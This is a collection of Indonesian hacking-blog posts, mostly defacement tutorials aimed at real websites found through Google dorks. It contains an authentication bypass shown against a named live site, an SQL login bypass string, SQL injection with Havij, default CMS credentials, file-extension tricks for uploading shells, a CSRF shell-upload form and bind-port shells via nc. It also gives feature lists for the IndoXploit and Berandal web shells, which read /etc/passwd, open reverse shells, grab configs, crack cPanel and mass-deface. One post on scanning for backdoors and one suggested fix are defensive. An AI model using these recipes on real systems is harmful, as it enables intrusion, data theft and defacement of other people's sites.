Termux ID: deface -->
Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Bypass Admin di CMS e-soft :)
1. Dorking Dulu Dorknya: intext:Website Design Company : e-Soft site:.bd


2. Jika kita sudah menemukan site nya :) selanjutnya masuk ke halaman login nya :)
    Tambahkan di belakang site nya: /index.php/esoft_cms/login
Contoh: http://site.com.bd/index.php/esoft_cms/login

*Tampilan Halaman Login nya!

3.Untuk Bypass Admin nya masukan Exploit nya :)
Username/Password: 'or'1'='1

4.Jika Berhasil anda akan masuk ke halaman Administrator nya :) dan Selamat anda dapat akses sebagai admin di website tersebut :)

*Tampilan Halaman Administrator nya :)

Sekian Tutorial dari Saya dan Terima Kasih

-Mr.7z

Thx to mr.Gh0st N@0b & Myanmar Noob Hackers

e-soft Webdesign Adminpanel Bypass

lets say hello heters !!!
      Mlm semua,,udah lama hibernasi akhirnya bisa share seputar ilmu gaib di sini ea...maaf yak admin di sini jarang post di karnakan ada yg lagi patah hati,,jadi homo,,mulung dll.
   
     Ok langsung aja kali ini aink share cara Menemukan File Backdoor di suatu web,yah caranya mungkin udah basi tapi masih banyak admin web yg rada" geblek :v kagak tau wkwkw ya siapa tau tutor kali ini bisa membantu admin web menjadi admin yg gesit :v


Ikutin Langkahnya Tod !

  • Download dulu backdoor scanner di SINI (Pasword RAR {adithomo123}
  • Extract file rar nya terus upload file BackdoorScanner.php ke web yg ingin di scan lalu panngil file yg di upload tadi misalnya http://nekopoi.co.li/upload/backdoorscanner.php


                                               Kurang lebih seperti itulah penampakannya....

  • beri centang di semua kecuali yg terakhir




                                                         Penampakan Keduanya Gan


  • Dan Terakhir Klik START SCAN
                                                           Sekarang coba kita lihat hasilnya



Coba Lihat yg berwarna hijau..ada 4 Shell Backdoor :v Sadeees....sekarang coba kita lihat sheel yg telah terdeteksi.....
Ada Yg Upload Sheel Indo Exploit :v tinggal hapus dah file yg terdeteksi tadi done :v lanjut nge JAV


     Oke sekian tutor sampah kali ini moga" bisa berguna buat admin supaya menjadi admin yg gesit ..cepat tanggap :v

Kalo ada yg kurang jelas atau mau tanya" silahkan tanya di SINI Dan Jangan Lupa Like Fanspage Kami Di                                                                                        SONO













Cara Menemukan File Backdoor Di Suatu WEB

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin


        Hello Beb , Kuy ,Gan ,Om  , Tante Sekalian Udh Lama Gk Posting Di Karnakan Sibuk Di Dunyat (Dunia Nyata). Ini Artikel Saya Yg Kedua,, Jarang Post Yahh :'v Ya Iyalah Ente kira gampang buat nyari bahan buat di post,di tambah lagi urusan tentang ceuek , Hey Kamu Apa Kabar #Nf wkwkwk Jadi Curhat :v Halah Gk Ush Ngebacot Lagi Langsung Aja Masuk Ke Tutorial Kali Ini Cara Menemukan Celah Website Dg SQL Poizon.
              Setelah kita mengetahui cara melakukan sqlinjection dengan havij, kali ini saya mau bahas tool yang gak kalah keren nih. Namanya adalah SQL Poizon, jadi fungsi dari tool ini adalah untuk menemukan celah dalam websiste dengan dork yang udah tersedia di dalam tool ini.Jadi pekerjaan kita mencari target bakal lebih cepat dengan menggunakansql poizon.  Untuk lebih jelasnya simak tutorial dibawah ini 

Step 1: Download SQL Poizon Software
Step 2: Buka Sql Poizon v1.1 – The Exploit Scanner.exe

Step 3: Seperti terlihat dalam gambar, di dalam tool ini sudah terdapat beberapa dork. Dalam contoh ini kita gunakan dork PHP , yaitu index.php?id=. Setelah memilih dork, kita klik scan untuk melihat hasil dari dork php tadi.


Step 4: Setelah kita menemukan target, kita bisa gunakan Sqli Crawler. Caranya kita tinggal klik kanan pada target kita pilih “Send to Sqli Crawler -> All”





Step 5: Pada tab Sqli Cralwer tab, kita tinggal klik Crawl untuk memastikan manakah website yang bisa kita hack dengan sql injection.



Step 6: Setelah ketemu target yang vuln, kita bisa klik export result untuk menyimpan daftar url yang vuln 




Nah kalo udah ketemu web yang vuln kan kita bisa langsung eksekusi, bisa kita hack lakukan SQL Injection secara manual atau bisa juga kita gunakan toolhavij untuk SQLi

Oke deh sekian dulu tutorial
kalau masih ada yg kurang jelas atau mau belajar seputar hacking  PM saja fb saya 
Di Sini

btw makasih buat Habil Zeus Udh Ngizinin Post Postingan yg sama hehehe.


Cara Menemukan Cela Website Dengan SQL Poizon

Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.


Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.
Jalankan command bind port pada shell indoxploit V.3.
$ rvr bp [PORT] perl
Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.
Jalankan command nc.
$ nc [IP] [PORT]

Oke itu saja, mudah bukan?
Sekian dulu kawann..


Tutorial Reverse Shell Dengan Bind Port

Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.


Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

Tutorial Deface bk27cms bypass administrator


Hell come back to maxteroit boy, sorry baru update lagi, dan kali ini saya akan membahas tentang Tutorial Deface bk27cms bypass administrator, dan tutorial ini saya dapatkan dari teman se-team saya yg bernickname k4luga, alias mas adhi :* , oke langsung saja kita bahas tutorialnya.

Dork sementara :
intext:Powered by BK27CMS

selebihnya kembangin sendiri yha :)

Pertama, kita dorking dulu menggunakan dork diatas :


setelah itu, kita pilih salah satu calon korbannya, jika sudah memilih, tambahkan /bk27panel setelah domain utama, misal >>> target.com/bk27panel

Kedua, Setelah masuk ke web loginnya, masukkan :
username : webmaster

dan password : 303305


Ketiga, setelah berhasil login, masuk ke tab Komponen


Keempat, tugas kita disini yaitu uploading shell, untuk itu, pilihlah menu Files Upload seperti gambar berikut


Kelima, nanti disana tersedia uploader files, nah disini sebaiknya kita bypass ekstensi shellnya dengan ekstensi .php.pjpeg >>> shell.php.pjpeg, lalu klik browse, trus carilah shell kalian untuk diupload.


Keenam, jika sudah terupload, akan tercantum nama file yg sudah kita upload tadi, lalu klik kanan lah mouse kalian lalu copy link location shell kalian, seperti berikut



Jika shell sudah terakses, terserah kalian mau kalian apaain :v , kami tidak bertanggung jawab :v,
sekianlah tutorial sederhana dari maxteroit, jika ada yg tidak jelas, silahkan tanyakan di komentar,
terima kasih

thx to :
k4luga a.k.a mas adhi (Owl Squad)

Tutorial Deface bk27cms bypass administrator

Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

IndoXploit Shell First Edition [ V.3 ]


Malem mblo :p
Lama gak update yaa :3

Kali ini gw mau share Tutorial SQL Injection Using Havij. 
Simak yaa :*

Bahan :
1. Dork
Sedot
2. Havij 1.17 Full Crack
Download 

Langkah - langkah :
1. Dorking ke google.

2. Tambahin string (') di belakang url target. Kalo error berarti vuln.

3. Masukin ke Havij.

4. Klik Analyze.

5. Klik 'Get Tables'.

6. Kita cari coloumn yg isinya mungkin ada username+password atau data buat login.

7. Kalo udah cari, klik 'Get Coloumn'.

8. Nahh, abis itu kita cari data nya. Username, password, email dll.

9. Klik 'Get Data'.

Taraaa, keluar deh username + passwordnya. :)

Kalo masih belum jelas, bisa liat video dibawah ini.


Okee, sekian tutorial gw kali ini, kalo masih bingung, bisa komen di bawah ^.^
Sampe ketemu di post berikutnya :*
.
Regards,

Tutorial SQL Injection [HAVIJ]

Malem fans :p
Lama yak gaketemu :v

Kali ini gw mau share Tutorial Deface Wordpress Plugin WP-DreamWork Gallery
Lansung ajaaa

Bahan: 
1. Dork : Kembangin lagi pake otak vokepers kalian :p
inurl:/wp-content/plugins/wp-dreamworkgallery/
2. CSRF :
Klik disini

Langkah - langkah :
1. Dorking ke gugel :v

2. Pilih salah satu site.

3. Masukin target lu ke CSRF nya.

4. Buka CSRF nya.

5. Pilih file/shell yg mau lu upload.

6. Kalo sukses bakal ada nama file kalian beserta file akses nya :)

7. Tinggal buka aja deh :)

Kalo masih belum jelas, bisa liat video dibawah :)


Okee, sekian tutorial gw kali ini. Kalo masih ada yg belum ngerti, ada kolom komentar di bawah :)
.
Regards,
Berandal. [OWL SQUAD]

Deface Wordpress Plugin WP-DreamWorkGallery

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Deface Wordpress Themes Multimedia1



Deface CMS Balitbang Versi 3.5.5 dengan CSRF Online



Assalamu'alaikum Wr. Wb.

yep, kali ini w bakal share metode Deface CMS Balitbang Versi 3.5.5 , metode ini adalah lanjutan dari metode CMS Balitbang 3.5.3 yang banyak di share di blog blog lain.
oke, langsung aja gausah kelamaan :'v Time is Mirror :v

Baca juga : 

Dork : "intext:Tim Balitbang versi 3.5.5"
kembangin pake imajinasi artis - artis JAV kayak Tsubasa Ozora misalnya :'v



Langkah - Langkahnya :
1. Dorking gugel, atau dimana aja terserah se enak lu :v



2. Buka CSRF tadi, isi kolom kolom terserah





3. Jika sudah klik next, Maka akan muncul kolom baru


4. Isi captcha nya, lalu klik go, nanti akan muncul di kolom target




5. Jika sudah klik kolom klik disini, Maka akan muncul validasi membernya, lalu klik kolom lewat sini brade!!


6. Klik kolom klik disini untuk bikin session, jika yes, kita coba upload shell dengan ekstensi phtml



7. akses shell target.sch.id/files/tugas/tgs-ganteng.phtml


Note :
* karena metode ini menyangkun web indo jangan tebas index yak :*

untuk lebih jelasnya bisa lihat videonya di bawah ini :D





Credit and Thanks to :
TKJ Cyber Art (base CSRF Online)
Owl Squad
Blck0wl?
Berandal
Rizky21ID
Z3U54774CK
Artefvcker
and all member Owl Squad


Best Regards,
Zetya

Deface CMS Balitbang Versi 3.5.5 dengan CSRF Online



Tampilan Halaman Login



Haii, Kali ini gw mau share Shell buatan gw sendiri :) Shell ini gw recode dari IndoXploit Shell First Edition.
Thanks buat IndoXploit Coders Team. :)

Semua fitur dalam shell ini dibuat Auto.
Tinggal Klik-Klik sajaa.

Tampilan Shell

Fitur:

K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
Back Connect

CPanel/FTP Auto Deface:
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp sajatidak semuanya bisa hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface.

Config Grabb :
-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel

Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Dan fitur tambahan :

  1. Server Info.
  2. PHP Info.
  3. Who Is Lookup.
  4. Safe Mode.
  5. Shell Finder.
  6. FTP Brute Force.
  7. Bypass etc/passw.
  8. CMS Lokomedia Exploiter.
  9. CMS Balitbang Exploiter.
  10. Port Scan.
  11. Zip Menu, [Upload and Unzip, ZIP Backup, Unzip Manual].
  12. Shell Checker.
  13. Hash ID.
  14. String Encoder.
  15. Network [Bind Port, Back Connect, Metasploit Connection].
========================================================================
========================================================================
Selamat Menikmati :)

Spesial Thanks:
.

Regards,
Berandal, [OWL SQUAD]

[RELEASE] Berandal Shell First Edition V.1